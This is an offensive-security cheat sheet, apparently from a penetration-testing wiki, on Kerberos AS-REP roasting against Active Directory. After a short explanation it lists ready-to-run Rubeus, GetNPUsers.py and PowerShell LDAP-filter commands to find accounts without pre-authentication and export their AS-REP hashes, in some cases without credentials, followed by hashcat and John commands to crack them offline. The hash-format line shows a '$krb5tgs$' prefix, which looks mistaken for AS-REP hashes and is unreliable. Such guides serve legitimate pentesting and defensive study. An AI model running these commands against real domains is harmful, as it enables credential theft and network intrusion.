# Exploitation - Kerberos AS\_REP roasting ### Overview An ASP\_REP roasting attack is an attack on the `Kerberos` authentication protocol that involves compromising the password of an user account that do not require `Kerberos` pre-authentication. The attack is based on the fact that the `KRB_AS_REP` response, in reply from the `KDC (Key Distribution Center)` for an initial authentication request `KRB_AS_REQ` to the `Authentication Service (AS)`, contains ciphertext encrypted using the client's secret key. By default, the `KRB_AS_REQ` must include a timestamp encrypted with the client's secret key, in order to permit the verification of the user identity before the `KDC` returns a `KRB_AS_REP` response. This verification is omitted for user accounts that do not require `Kerberos` pre-authentication, i.e accounts with the account property `DONT_REQ_PREAUTH`. These user accounts secrets are exposed to offline cracking, against the ciphertext, attack that are much faster and can not be time restricted. ### Automated DONT\_REQ\_PREAUTH user accounts discovery and export of AS-REP responses The following tools can be used to automate the discovery of user accounts that do not require `Kerberos` pre-authentication and the request and export of `KRB_AS_REQ` response for offline cracking. In order to enumerate the domain user accounts, `Rubeus` / `GetNPUsers.py` must be started in a domain authenticated security context or provided with working domain credentials. ``` Rubeus.exe asreproast /outfile: Rubeus.exe asreproast /format:john /outfile: Rubeus.exe asreproast /creduser:'\' /credpassword:'' /dc: /domain: /outfile: # Will attempt to request a TGT for all users. GetNPUsers.py -request /[:] ``` ### DONT\_REQ\_PREAUTH user accounts discovery The following tools can be used to discover user accounts that do not require `Kerberos` pre-authentication: ``` Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" Get-ADUser -Server -Credential -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" Get-NetUser -Server -Credential -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" ``` ### Request and export of KRB\_AS\_REP responses The following tools can be used to request and export `KRB_AS_REP` for user accounts that do not require `Kerberos` pre-authentication. The following operations do not require the knowledge of valid credentials. ``` Rubeus.exe asreproast /user: /outfile: Rubeus.exe asreproast /dc: /domain: /user: /outfile: GetNPUsers.py '/' -usersfile GetNPUsers.py '/' -dc-ip -usersfile -format john ``` ### Offline cracking of KRB\_AS\_REP responses Both `John the Ripper` (magnumripper fork) and `hashcat` can be used to crack the `KRB_AS_REP` responses. The hash needs to respect the following format to be recognized `hashcat`: ``` # ENCRYPTION_TYPE 23 = RC4 # ENCRYPTION_TYPE 17 = AES128 # ENCRYPTION_TYPE 18 = AES256 $krb5tgs$$*@:$85DA[...] ``` Depending on the tool used, the hash retrieved may need to be manually updated. The following commands can be used to crack the `KRB_AS_REP` responses: ``` # Its recommended to use Hashcat on a Windows OS for better performance due to driver compatibility hashcat64.exe -m 18200 -a 0 [-r ] '[ | ]' john --wordlist= ``` *** ### References